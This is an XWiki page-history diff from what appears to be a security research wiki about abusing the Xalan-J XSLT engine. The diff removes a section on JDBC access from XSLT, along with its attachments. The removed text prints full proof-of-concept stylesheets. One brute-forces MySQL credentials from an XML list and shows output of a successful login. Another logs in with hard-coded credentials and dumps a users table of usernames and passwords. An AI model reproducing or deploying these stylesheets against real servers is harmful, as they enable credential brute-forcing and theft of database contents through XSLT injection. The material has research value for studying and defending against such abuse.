Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version 63.1
edited by Nicolas Gregoire
on 2012/01/12 22:14
Change comment: There is no comment for this version
To version 57.2
edited by Nicolas Gregoire
on 2012/01/12 00:14
Change comment: There is no comment for this version

Summary

Details

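--- a/Engine_XalanJ
+++ b/Engine_XalanJ
@@ -66,24 +66,4 @@
 
 == JDBC connectivity ==
 
-It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver.
-
-=== Simple connection ===
-
-The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
-
-|=Namespace|=Extension function|=PoC
-|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
-
-=== Credentials brute-forcing ===
-
-The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
-
-
-Here's the output when launched from the CLI :
-
-##$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
-Username : [root] / Password : [] :
-Username : [root] / Password : [uberpasswd] :
-Username : [root] / Password : [cnam] : OK !!
-Username : [pma] / Password : [pma] : ##
+xxx TODO xxx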
Icon xalanj-jdbc-bruteforce.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -775 bytes
Content
... ... @@ -1,35 +1,0 @@
1 -<data>
2 - <foobar>
3 - <DBINFO>
4 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
5 - <dburl>jdbc:mysql://localhost/</dburl>
6 - <user>root</user>
7 - <password></password>
8 - </DBINFO>
9 - </foobar>
10 - <foobar>
11 - <DBINFO>
12 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
13 - <dburl>jdbc:mysql://localhost/</dburl>
14 - <user>root</user>
15 - <password>uberpasswd</password>
16 - </DBINFO>
17 - </foobar>
18 - <foobar>
19 - <DBINFO>
20 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
21 - <dburl>jdbc:mysql://localhost/</dburl>
22 - <user>root</user>
23 - <password>cnam</password>
24 - </DBINFO>
25 - </foobar>
26 - <foobar>
27 - <DBINFO>
28 - <dbdriver>com.mysql.jdbc.Driver</dbdriver>
29 - <dburl>jdbc:mysql://localhost/</dburl>
30 - <user>pma</user>
31 - <password>pma</password>
32 - </DBINFO>
33 - </foobar>
34 -</data>
35 -
Icon xalanj-jdbc-bruteforce.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -979 bytes
Content
... ... @@ -1,29 +1,0 @@
1 -<?xml version="1.0"?>
2 -
3 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 - version="1.0"
5 - xmlns:sql="org.apache.xalan.lib.sql.XConnection"
6 - extension-element-prefixes="sql">
7 -
8 -<xsl:output method="text" indent="yes"/>
9 -<xsl:variable name="query">SELECT "OK !!"</xsl:variable>
10 -
11 -<xsl:template match="//data">
12 - <xsl:for-each select="foobar">
13 -
14 - <xsl:variable name="cinfo" select="DBINFO"/>
15 - <xsl:variable name="user" select="DBINFO/user/text()"/>
16 - <xsl:variable name="passwd" select="DBINFO/password/text()"/>
17 -
18 - <xsl:variable name="db" select="sql:new($cinfo)"/>
19 - <xsl:variable name="data" select='sql:query($db, $query)'/>
20 -
21 - <xsl:copy-of select="concat('Username : [', $user, '] / ')" />
22 - <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" />
23 - <xsl:copy-of select="$data" /><xsl:copy-of select="'&#x0A;'" />
24 -
25 - </xsl:for-each>
26 -</xsl:template>
27 -
28 -</xsl:stylesheet>
29 -
Icon xalanj-jdbc-query.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -848 bytes
Content
... ... @@ -1,22 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:sql="org.apache.xalan.lib.sql.XConnection"
3 - extension-element-prefixes="sql"
4 - version="1.0">
5 -
6 -<xsl:output method="xml" indent="yes"/>
7 -
8 -<xsl:param name="driver" select="'com.mysql.jdbc.Driver'"/>
9 -<xsl:param name="dburl" select="'jdbc:mysql://localhost/test_db'"/>
10 -<xsl:param name="user" select="'root'"/>
11 -<xsl:param name="pass" select="'14m31337'"/>
12 -<xsl:param name="query" select="'SELECT uid,username,passwd FROM users'"/>
13 -
14 -<xsl:template match="/">
15 - <xsl:variable name="dbh" select="sql:new($driver, $dburl, $user, $pass)"/>
16 - <xsl:variable name="table" select='sql:query($dbh, $query)'/>
17 - <xsl:copy-of select="$table" />
18 - <xsl:value-of select="sql:close($db)"/>
19 -</xsl:template>
20 -
21 -</xsl:stylesheet>
22 -